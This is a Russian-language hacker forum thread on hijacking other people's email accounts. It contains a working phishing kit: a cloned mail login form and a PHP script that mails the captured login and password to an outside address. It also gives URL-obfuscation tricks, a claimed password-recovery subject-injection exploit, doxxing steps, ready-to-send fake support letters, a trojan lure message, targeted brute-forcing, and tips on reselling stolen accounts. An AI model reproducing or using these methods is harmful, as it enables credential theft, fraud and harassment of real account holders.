Ну че? продолжим, а то Algol закрыл самую тусу, где больше всего постов. Я конечно малость переусердствовал ну..., а как без этого. Бывалый чел поймет меня. Так что продолжим тему в серьез, пока админы не обидятся на столь популярную тему.

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Теперь я раскажу вам о самом простом методе взлома, расчитанный на лоха. Ведь так просто заИметь шестизначку, но так-же легко её потерять. Для начала нам нужно сохранить на харде страницу <span style='color:#00FF00'>ошибки</span> (http://mail.xakep.ru/cgi-bin/mail?index=1). Сами видете два поля ввода для <span style='color:#009900'>логин</span> и <span style='color:#009900'>пасс</span>. Нам нужно чтобы введя в эти поля данные пароль отсылался прямо к нам в руки. Теперь открываем её с помощью <span style='color:#009900'>html</span> редактора, лучше всего использовать <span style='color:#00FF00'>DreamweaverMX</span> (http://download.macromedia.com/pub/dreamweaver/esd/previewrelease/DreamweaverMXInstaller.exe), хотя можете сделать это обычным Notepad, Вот фрагмент скрипта:

<span style='color:#0033FF'>&lt;table cellpadding=1 cellspacing=0 border=0&gt;
&lt;form method=&quot;post&quot; name=&quot;logon&quot; action=&quot;http://mail.xakep.ru/cgi-bin/mail&quot; onSubmit=&quot;Save();&quot;&gt;
&lt;tr&gt;
&lt;td class=small align=right&gt;&lt;b&gt;eiaei&lt;/b&gt;&lt;/td&gt;
&lt;td class=text&gt;&lt;input type=&quot;text&quot; name=&quot;username&quot; size=&quot;8&quot; style=&quot;width: 95px;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;domain&quot; value=&quot;xakep.ru&quot;&gt;&lt;/td&gt;
&lt;td class=text&gt; @xakep.ru&lt;/td&gt;
&lt;td&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
&lt;td class=small align=right&gt;&lt;b&gt;ia?ieu&lt;/b&gt;&lt;/td&gt;
&lt;td class=text&gt;&lt;input type=&quot;password&quot; name=&quot;password&quot; size=&quot;8&quot; style=&quot;width: 95px;&quot;&gt;&lt;/td&gt;
&lt;/tr&gt;</span>

Нас интересуют только <span style='color:red'>action</span>, <span style='color:red'>username</span> и <span style='color:red'>password</span>. За что отвечают username и password на монятно. А в action нам следует указать путь к нашему <span style='color:#009900'>php скрипту</span>. Вот весь скрипт:

<span style='color:#0033FF'>&lt;?
mail(&quot;redx@narod.ru&quot;,
&quot;Lost password&quot;,
&quot;$username\n
$password
&quot;);
echo (&quot;
&lt;META HTTP-EQUIV=\&quot;Refresh\&quot; content =\&quot;0; URL=http://mail.xakep.ru/cgi-bin/mail?index=1\&quot;&gt;
&quot;);
?&gt;</span>

<span style='color:#009900'>Редирект</span> тоже играет важную функцию, и он обязательно должен указывать на страницку ошибки, чтоб не возникало подозрений. Вроде у нас все настроено, осталось провести тест, посмотри на мой <span style='color:#00FF00'>пример</span> (http://xakep1.by.ru/xakep.htm).
Для танкистов: <span style='color:#CCFFFF'>нам нужен хост с поддержкой php</span>. Из бесплатных нам подойдет <span style='color:#00FF00'>Holm</span> (http://register.h1.ru/index.shtml).

Кажись вы не довольны тем что <span style='color:#009900'>url</span> у вас получился типа <span style='color:#009900'>http://antilamer.h1.ru</span>. И возникает вопрос, как бы все это затарить. Я предлагаю вам хотя бы кодировать в <span style='color:#00FF00'>hex</span> (http://redx.narod.ru/download/txt2hex.zip). И мы можем превратить наше www.antilamer.h1.ru в <span style='color:#009900'>%61%6E%74%69%6C%61%6D%65%72%2E%68%31%2E%72%75</span>. Можно перед hex кодом добавить еще www.xakep.ru@. Выглядеть это будет так:
<span style='color:#009900'>http://xakep.ru@%61%6E%74%69%6C%61%6D%65%72%2E%68%31%2E%7 2%75</span>

Удачного хака.[/QUOTE]<span id='postcolor'>

Я написал такую статью, но на неё мало кто отреагировал, хотя..., самый действенный метод. В отличии от моей ловушки в которую мог попасть случайный прохожий, в этом методе можно направить свою атаку на определённого человека. Самое главное убедить его в необходимости залогиниться с нашей страницы. Методов моря, хоть мыльте от SUPPORT'а или как фантазия позволит. Я свою жертву в Инет-Клубе сам заставил залогиниться, набрал адрес своей страницы, и предложил ему проверить свою почту. Благо мест в зале небыло..., а я такой добрый.

Способ отличный, им можно взломать не только мыло. Можно сделать такую же страницу провайдера и сказать юзверю что это быстрый способ проверить личный кабинет, например, на РОЛе. Неплолхо бы эту статью поместить в мой топик про халявный инет.

Вот вам тестовая страница (http://members.lycos.co.uk/icqclub/php/mail.htm)

Пароль и логин отсылаются на мыло:
test_for_antichat@xakep.ru
pass: antichat

Проведите тест и сами убедитесь.

Да...ничё так способ.Только на лохов из чата расчитан.Надо топик открыть по всем таким способам,ну типа этго или с так называемыми email-роботами RedX'a http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif

и урл напишите тут на новую тему...

=&gt; MrPort

Так любой метод расчитан только на лохов, мы то дай бог фишку просечем.

Так а что мыло ломать УЖЕ никто не хочет? Ну или научить.

На mail.ru несколько МИЛЛИОНОВ пользователей. Есть процент, который имеет слабую память и тупые мозги, чтоб запомнить свой пароль и частенько эти перцы сталкиваются с проблемой забывания пароля Итак, даже небольшой процент от более чем милионной толпы владельцев мыльниц - это тоже своеобразная толпа, которая требует свои пароли. Существуют всякие системы аля &quot;Забыл пароль&quot; в котором вас спрашивают ответ на секретный вопрос, данные, которые Вы вводили при регистрации и т.п. Но самое интересное, что этим занимается не человек, а машина, т.е. обычная программулина !!!! А если есть программа - есть в ней дыра. Теперь приступим к описанию конкретных действий.
Тут все просто. По адресу pass_retriever@mail.ru сидит mail-робот, который анализирует запросы на восстановление пароля и в зависимости от этого либо уточняет ваши данные, либо сразу шлет пароль. На сайте есть форма для заполнения с всевозможными параметрами, которая потом шлется роботу со специальным Subject'ом. Фишка в том, что если в сабжект впихнуть не один, а два запроса, то проверятся будет последний ящик, а информация будет выслана для второго! Так шевелим мозгами... Правильно! Высылаем два запроса: в одном сообщаем инфу о ящике жертве, во втором инфу о своем (о своем то мы все знаем http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif )

Итак, мы хотим обломать vasya_pupkin@mail.ru
Наш ящик hacker@mail.ru пароль qwerty
Пишем письмо роботу на pass_retriever@mail.ru
Subject: login=vasya_pupkin&amp;pass=&amp;answer=;login=hacker&amp;pass =qwerty&amp;answer=

Т.е. первый раз вставляем в тему письма запрос о ящике-жертве - vasya_pupkin@mail.ru : login=vasya_pupkin&amp;pass=&amp;answer=
А потом, через точку с запятой второй запрос, с вашими данными, которые робот проверит и убедится, что они правильные!
login=hacker&amp;pass=qwerty&amp;answer=
Итого : тема сообщения выглядит вот так :
login=vasya_pupkin&amp;pass=&amp;answer=;login=hacker&amp;pass =qwerty&amp;answer=
Все, ждите пасс на ваше мыло!!! http://forum.antichat.ru/iB_html/non-cgi/emoticons/biggrin.gif &nbsp;http://forum.antichat.ru/iB_html/non-cgi/emoticons/biggrin.gif

vetal, ты тут нас за детский садик держишь?

RedX, я тут за не имением времени не вник в твою мессагу. А не проще использовать баг IE к подменным ссылкам? А еще лучше все это совместить...

Я про это где-то тоже писал тут....

Здрась-те у меня тут пара вопросов о Брутфорсе:
1 можно-ли задать настройки чтоб перебор начинался не с начала а скажем &nbsp;с 6 знака?
2 можно ли сохранить работу перебора чтоб после перезагрузке заного не начинать?

хех... vetal, не смеши народ)) говорят что действительно это кокдато работало, хотя я эти чудесные времена не застал.. но как бы там нибыло сейчас это нигде не сработает.. еслиб угнать мыло было так просто уже никтоб ими не пользовался, так как все бы уганяли их друг у друга по нескольео раз в деньhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/biggrin.gif имхо

Солидарен с Че Гевара ты еще напиши про администрацию у которай полетела база и для ее востановления нужно прислать логин и пасс


http://forum.antichat.ru/iB_html/non-cgi/emoticons/biggrin.gif

Мальчики , кто сможет, бедной девушке,обьяснить как взломать ящик на яндексе. Ну прям сильно надо. &nbsp;http://forum.antichat.ru/iB_html/non-cgi/emoticons/rolleyes.gif &nbsp;Какой-нибудь &nbsp;ну-у самый простенький метод.Пожалуйста... http://forum.antichat.ru/iB_html/non-cgi/emoticons/rolleyes.gif
Зарание благодарна.

Авотр статьи Thief копируй себе
Привет тебе ...
Сегодня мы ещё раз обсудим такой вопрос как увод мыла или почтового ящикаhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif...
Я понимаю что ты уже видел сотни а мож и тысячи разных способов, но все они однобокие ...
И вот я решил тебе поведать самые реальные способы...
Сразу хочу сказать что один способ я взял из одного журнала(спец хакер - это не рекламная акция нах!http://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif
,конечно я его и так знал но там мне понравилось само описаниеhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif...
Мы выкинем из головы куки и скриптовые хитрости,
и будем думать как можно увести мыло и как себя при этом вести ...
Вообщем так когда я начитался кучу статей про увод мыла, у меня в голове отложилось только самое основное
из 50 статей которые я прочитал с лёгкостью можно слепить одну нормальную , что я и собираюсь
сделать.

И так посмотрим как это все же работает ....
Способ №1)Тебе непонравился какой то человечек в инете и ты подумал ему поднасрать.=)(правильно я
бы зделал так жеhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif.Например у того человека который тебе не нравиться ник &quot;LAMOZ&quot;..
С чего мы начинаем:мы открываем http://www.gogle.ru/ -именно его т.к. там собранно 5 поисковиков,
это упростит твои поиски.Так вот набираем там LAMOZ и смотрим на инфу которую тебе выдал поисковик,
смотри ка у твоего недруга есть сайтик ,пройдись по нему насри заоодно в гостевой и на форумеhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif))
посмотри кто с ним корешиться и разговорись с его друганами, спроси где он живёт ,только
таким образом что ты говориш мол .....:&quot;ой блин а я совсем забыл у &quot;LAMOZa&quot; же завтра день ражденья ...&quot; тебе
говорят мол ты чё у него же **.**. ....и т.д. так вот..если ты обнаружел что у него на ящике
стоит перессылка на другой (т.е. пароль может выслаться и на другой ящик указанный им !http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif
То если ты увидешь в поисковике ещё одно мыло которое всеми внешними признаками
будет указывать на этого LAMOZa ,то попробуй выслать пароль на него ,если получилось то попробуй ломануть этот ящик
и т.д..Кстати если этот чел пользуется асей поищи и её в инете навярняка он оставлял кому нить
в инете свой номер аси (например в гостевой)
З.ы.Например я всегда пользуюсь первым способом он самый эффертивный поверь мне
не смотря на его простоту и наивность этот способ может дать тебе очень много ....
кстати в своей статье про конфинденциальность..я писал что после себя надо замести немного
свои же следы например нашёл в поисковике много хрени про себя , но думаеш если кто увидет мне...
****** вот смотри почаще в поисковиках свой ник или асю или мыло!
Способ №2)С.И. ---социальная инженерия или обратная соц. инженерия...
С.И. основана на психологии естеснно , очень много полезной литературы можно найди именно
по этому предмету, очень много книжек по психологии продаються на улице...почему бы не
потренероваться в качестве психологаhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif
С.И. = ты входиш в контакт с жертвой естеснно она тебе не очень то и доверяет ,но ты должен
расположить её к себе таким образом что бы она начала тебе доверять.....ну например сделать
много приятных (намекающих на доверие к самой жертве) жестов например :дать пасс на фтп кого нить
левого сайта на http://www.by.ru/ http://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif мелочь, но согласись если жертва увидит как ты ей доверяеш ,то несомненно
с её стороны поступит такае же реакция это только дело времени..поверь мне или просто сказать
мол давай встретимся забухаемсссс и всё такое (встречаться не обязательно ,но прикинь жертва
будет рассуждать таким образом :мол...вот он типа не кинет он даже блин встретиться предлогал !
,ну или например так ты залазиеш на другую асю и говориш ему всякие гадости ,после чего одновременно
залазиеш на свою и спрашиваеш как у него дела ,он тебе ясное дело говорит что мол,......да вот блин
придурок какой то заколебал ,и ты ему отвечаеш что ща я поправлю ситуацию.......и пи**еш асю у себя же
и отдаёш её ему в качестве трафея прикинь он будет счастливhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif))
,а если таких вот пустячков будет много ,многоhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif ,то и доверия к тебе очень повыситься 100%...
О.С.И.---Обратная социальная инженерия основывается так же на психологии только в упрощённом ,а где
то и в усложнённом варианте....да вот так
Так вот осуществляеться она следующим способом:
Я не буду углу***ться в подробности, а просто поясню что это за метод такой надеюсь что ты и сам всё поймёш
если немного напрегёш свои мозги.
У жертвы неожиданным образом должны появиться проблемы (например с пользаванием этого же ящика) ,и для помощи он ищет себе
грамотного чела который во всем этом охрененно рулит ,так вот здесь ты и должен появиться и опять же психологией завладеть его
мыльникомhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif!(понимаю сам способ не самый лёгкий ,но жертва сама тебя находит и подозрения что ты её обманешь у неё просто отпадёт!http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif
Способ №3)Письма.....,как много можно ими добиться (если конечно умееш красиво писатьhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif).
Так вот суть этого способа заключается в том что ты должен написать (или найти в инете) письмо &quot;красивого&quot; содержания например такое
Пример из журнала:

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
From: mail_support@mail.ru
To: ламо@mail.ru (как вы поняли немного я изменилhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif)
Тема:Служба технической поддержки Mail.ru

Уважаемый пользователь &quot;ламо&quot; !
От лица нашего интернет-холдинга Mail.ru мы
приносим свои извинения за причинение вам некоторых
неудобств.
В связи со сменой нашего обарудования на
более новое нам нужно перенести всю
пользовательскую информацию на новые жёсткие диски.
Соответсвенно просим повторно
прислать некоторую информацию о своюм
аккуанте. Это нужно для предотвращения
всякого рода ошибок и неточностей.Просто
пришлите по адресу mail_support@mail.ru
письмо с таким форматом:
Login:
Password:
Password (ещё раз):
Имя:
Фамилия:
Спасибо за помощь.Все эти временные
неудобства только от того, что мы хотим
увеличить качество и сороть работы с нашей
почтовой системой.
С уважением,
администраторы
интернет-холдинга Mail.ru
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@

Но как гласило в этом же журнале некоторае пользователи не хотят расставаться со своими паролями(мистика какаяhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif)
Так вот обычному ,а может даже необычному юзерверю тяжело как то раставаться с со своим паролем на мыльник (может потому что этот самый пароль стоит
на его асе или ещё где нить и он начинает АНАЛизировать правда всё это или просто какой то паренёк захотел поиметь его пасс)
,а вот с ответом на секретный вопрос расстаться гораздо проще ...
Ещё один пример из журнала:

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
From: Oldmail Password Support Serveice

To: Много кому слалось...
Тема: ВНИМАНИЕ! Проблемы с авторизацией на
сервере &quot;Старой почты&quot;

Уважаемый пользователь!

В связи с переходом сервера на новое
програмное обеспечение были открыты некие
уязвимости в системе безопасности.Мы не
можем точно сказать , были ли повреждены или
несанкционно проситанны Ваши
персональные файлы, поэтому просим Вас
ответить на это письмо, по привёдённому ниже
формату. ЕСли у Вас возникнут проблемы с
написанием данного письма, ответьте на это
письмо, указав в теме слово &quot;help&quot;, и тогда
наша служба вышлет Вам необходимые инструкции
и форму для заполнения.

ВНИМАНИЕ!
Если от Вас не поступит ответа на это письмо,
а почтовый траффик по Вашему пользователю будет
поступать, Oldmail оставляет за собой
право на отключение и удаление Вашей учётной
записи.

Для корректного ответа удалите все строки
письма (включая эту) и запишите впервой
строке ответ на Ваш секретный вопрос.
Ваш вопрос: Ваше прозвище в школе?


Спасибо за то, что пользуетесь услугами
&quot;Старой почты&quot;

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Ещё раз процитирую журнал...
Результативность такого письма пости 100%
и может пригодиться не только на Oldmail, хотя некоторым
приходилось высылать html форму для заполненияhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif
Так что надо запомнить правило как велел парень из журналаhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif))
загрузить,припугнуть,показ ать авторитетность (видиш мол....я твой
секретный вопрос знаю, значит я админhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif))).А узнать его может каждый!http://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif
Способ №4)Троянчики -уменьшительно-ласкательное от слова троянhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif
Имеют такую хорошую (а для кого то плохую) отсылать все или почти
все пароли тому от кого жертва получила этот самый троян (конечно же ты это всё
знаеш !http://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif,но вот номально впарить его что бы жертва не о чём не подозревала
и мало того что бы она с удовольствием и спешкой качала и запускала его получается не всегда=(
Рассмотрим только один бустрый способ т.к. другие более длительные.
Например ты знаеш что жертву точно не зовут Миша.
Ты пишеш жертве письмо такого содержания:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Привет Михан !
Наконец то я добрался до этого инета ,а то тут эта ссесия роды пугают что в армию
пойду короче головняки сам понимаеш слушай вообщем такая хрень ща твориться этот
Dl4!0Hg написал наконец то эту чёртову прогу я ему отдал уже все 60$ за неё ,но
ты мне должен теперь 30$ .Бля я ваще охренел прога на первый взгляд примитивная,
но потом понимаеш что стоит больше ...надо быстрей юзать пока этот Dl4!0Hg не выложил
её на каком нибудь хакерском сайте или форуме!!!Он мне сказал что в скором будущем так и поступит
урод ***...прикинь друганам её уже раздал своим вот козёл!
НУ лано короче ты позвони мне сегодня на сотовый ,а то у меня домашнему что то
плохоhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif))
Да кстати позвани Серёге он что то спрашивал на счёт футбола.
Удачи я мож ещё до вечера вылезу в инет.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

.................................................. ..........
Вот так вот не принуждённо на дружеских словечках ты впариваеш троянчика.......
жертва думает вот парень ***анулся , а я у него на халяву ща эту прогу
юзать буду хе хе хе лолhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif
Ну или ваще делаеш просто как сказал Zebax ломишся в асю парню и орёш ему вот короче Колян
качай я скоро приду ***ин головняки короче через пару часов.....сам этим временем сидиш
в инвизе и ждёш когда придёт на инет пейджерhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif
Способ №5) Брут....как хорошо когда ты потягиваеш пивко, а за тебя пароли подбирает прога
(просто красотаhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif) ,но ты не должен просто скачать словарь и загнать его в прогу
ты должен составить конкретный словарь к конкретному юзверю.....
Смотри всю инфу про него вплоть то того сколько мигагерц у него в компеhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif
Короче соберю всю подноготину как в первом случае загани в текстовик скачай брут для
мыльников кстати скачать можно прямо у нас (так же как и словари) и бруть в своё удовольствие .....
конечно говорить легче чем делать ,но всё равно удачи тебеhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif
Способ №6)Валим сервак......ну это ты как нить сам браток....,я что то спать хочуhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif
Как себя после этого (после того как ты ломанул мыло)вести?!
1)Некогда не меняй вопрос на чекретный ответ а вот сам ответ поменять не забудь
2)поменяй всю инфу о юзвере и запиши где то и старую и новую тобой введённую инфу
3)Не когда не офишируй что ты угнал мыльник тем более тому у кого ты его увёл!!!!
сам подумай нужны ли тебе враги из за какого то иыла!
4)Лучше стуканись с какой нить аси и продай эти мыльники ему же ну или обменяй на что нить ,это намного полезнейhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif)

Многое понравилось, но:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Вообщем так когда я начитался кучу статей про увод мыла, у меня в голове отложилось только самое основное
из 50 статей которые я прочитал с лёгкостью можно слепить одну нормальную , что я и собираюсь
сделать. [/QUOTE]<span id='postcolor'> а получилась еще одна статья в дополнение к тем 50-ти.

Способ №1 можно назвать &quot;Сетевой шпионаж&quot;) Весьма забавно бывает этим заниматься) Где ссылку на гостевую нашел, где инфу из аськи позырил, где мыльцо на прослушку поставил, логины проанализировал и тд, вобщем - простор для творчества:)

Насчет писем из службы поддержки - давным давно дохлый номер ИМХО. Даже если спрашивать секретный ответ. Лучше ненавязчиво так прислать анкету(типа за заполнение - приз. Приз, кстати должен соответсвовать увлечениям жертвы, например цифровой фотик, чтоб сразу отключить мозг), где среди прочих вопросов незаметненько так приютится вопрос, подразумевающий секретный ответ.
Про брутус
ты должен составить конкретный словарь к конкретному юзверю.....
Это ясно как божий день, но по-моему нигде не упоминалось еще:)

ну молодца добавил но старые способы тоже иногда катят.

не работает... ууууу а я тааак надеялась